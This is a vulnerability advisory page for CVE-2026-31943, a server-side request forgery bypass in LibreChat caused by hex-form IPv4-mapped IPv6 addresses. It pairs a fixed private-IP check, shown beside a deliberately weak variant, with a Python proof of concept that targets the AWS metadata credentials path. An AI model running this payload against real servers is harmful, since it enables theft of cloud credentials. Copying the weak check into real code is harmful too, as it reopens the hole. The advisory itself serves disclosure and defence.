Security Vulnerability Report
CVE-2026-31943 CVSS 8.5 HIGH

Published: 2026-03-27 20:16:30
Last Modified: 2026-03-31 20:16:27

Description

LibreChat is a ChatGPT clone with additional features. Prior to version 0.8.3, `isPrivateIP()` in `packages/api/src/auth/domain.ts` fails to detect IPv4-mapped IPv6 addresses in their hex-normalized form, allowing any authenticated user to bypass SSRF protection and make the server issue HTTP requests to internal network resources, including cloud metadata services (e.g., AWS `169.254.169.254`), loopback, and RFC1918 ranges. Version 0.8.3 fixes the issue.
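As an added example (not LibreChat's own code or its 0.8.3 fix), a private-range check of the kind the description calls for: it folds both the dotted and the hex form of an IPv4-mapped IPv6 address back to IPv4 before matching ranges, beside a weak check that only unwraps the dotted form and therefore misses `::ffff:a9fe:a9fe`. The range list and helper names are assumptions.

```typescript
// Added illustration (not LibreChat's code): unwrap IPv4-mapped IPv6 before range matching.
const PRIVATE_V4: Array<[string, number]> = [["10.0.0.0", 8], ["172.16.0.0", 12],
  ["192.168.0.0", 16], ["127.0.0.0", 8], ["169.254.0.0", 16], ["0.0.0.0", 8]];
const V4_RE = /^\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}$/;
function isIPv4(s: string): boolean {
  return V4_RE.test(s) && s.split(".").every((o) => Number(o) <= 255);
}
function ipv4ToInt(ip: string): number {
  return ip.split(".").reduce((acc, o) => ((acc << 8) + Number(o)) >>> 0, 0);
}
function inCidr(ip: string, base: string, bits: number): boolean {
  const mask = bits === 0 ? 0 : (~0 << (32 - bits)) >>> 0;
  return ((ipv4ToInt(ip) & mask) >>> 0) === ((ipv4ToInt(base) & mask) >>> 0);
}
function expandIPv6(addr: string): number[] | null { // eight 16-bit groups, dotted tail folded
  let s = addr.replace(/^\[|\]$/g, "").toLowerCase();
  if (!s.includes(":")) return null;
  const tail = s.slice(s.lastIndexOf(":") + 1);
  if (tail.includes(".")) {
    if (!isIPv4(tail)) return null;
    const n = ipv4ToInt(tail);
    s = s.slice(0, -tail.length) + (n >>> 16).toString(16) + ":" + (n & 0xffff).toString(16);
  }
  const halves = s.split("::");
  if (halves.length > 2) return null;
  const head = halves[0] ? halves[0].split(":") : [];
  const rest = halves.length === 2 && halves[1] ? halves[1].split(":") : [];
  const missing = 8 - head.length - rest.length;
  if (missing < 0 || (halves.length === 1 && missing !== 0)) return null;
  const groups = [...head, ...new Array<string>(missing).fill("0"), ...rest];
  const nums = groups.map((g) => (/^[0-9a-f]{1,4}$/.test(g) ? parseInt(g, 16) : NaN));
  return nums.some(Number.isNaN) ? null : nums;
}
export function unmapIPv4(addr: string): string { // ::ffff:a.b.c.d or ::ffff:xxxx:xxxx -> a.b.c.d
  const g = expandIPv6(addr);
  if (!g || g.slice(0, 5).some((x) => x !== 0) || g[5] !== 0xffff) return addr;
  return [g[6] >> 8, g[6] & 0xff, g[7] >> 8, g[7] & 0xff].join(".");
}
export function weakIsPrivateIP(addr: string): boolean { // unwraps the dotted ::ffff: form only
  const v4 = addr.replace(/^::ffff:/i, "");
  return isIPv4(v4) && PRIVATE_V4.some(([b, n]) => inCidr(v4, b, n));
}
export function isPrivateIP(addr: string): boolean {
  const v4 = unmapIPv4(addr);
  if (isIPv4(v4)) return PRIVATE_V4.some(([b, n]) => inCidr(v4, b, n));
  const g = expandIPv6(addr); // ::, ::1, fc00::/7 (unique-local), fe80::/10 (link-local)
  return !!g && ((g.slice(0, 7).every((x) => x === 0) && g[7] <= 1)
    || (g[0] & 0xfe00) === 0xfc00 || (g[0] & 0xffc0) === 0xfe80);
}
```

Resolve hostnames first and run the check on every address the resolver returns, or the normalization is bypassed by DNS rather than by address syntax.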

CVSS Details

CVSS Score
8.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:librechat:librechat:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:librechat:librechat:0.8.3:rc1:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:librechat:librechat:0.8.3:rc2:*:*:*:*:*:* - VULNERABLE
LibreChat < 0.8.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# PoC for CVE-2026-31943 (LibreChat SSRF)
# This script demonstrates how to bypass the IP check using IPv6 hex format.
import requests


def ipv4_to_ipv6_hex(ipv4):
    """Convert IPv4 to IPv4-mapped IPv6 hex representation."""
    parts = list(map(int, ipv4.split('.')))
    hex_ip = '{:02x}{:02x}:{:02x}{:02x}'.format(parts[0], parts[1], parts[2], parts[3])
    return f'::ffff:{hex_ip}'


def main():
    target_base_url = "http://librechat-server-url/api/endpoint"
    # Target internal IP (e.g., AWS Metadata Service)
    internal_target = "169.254.169.254"
    # Bypass payload using IPv6 hex format
    bypass_payload = ipv4_to_ipv6_hex(internal_target)
    malicious_url = f"http://[{bypass_payload}]/latest/meta-data/iam/security-credentials/"
    print(f"Testing SSRF with payload: {malicious_url}")
    # Example request structure (adjust based on actual API)
    data = {
        "url": malicious_url
    }
    try:
        response = requests.post(target_base_url, json=data)
        if response.status_code == 200:
            print("[+] Request successful! Internal data may be leaked.")
            print(response.text[:200])  # Print partial response
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
    except Exception as e:
        print(f"[!] Error: {e}")


if __name__ == "__main__":
    main()
```

References

https://github.com/danny-avila/LibreChat/security/advisories/GHSA-w5r7-4f94-vp4c - Vendor Advisory, Exploit

Weakness: CWE-918 (Server-Side Request Forgery)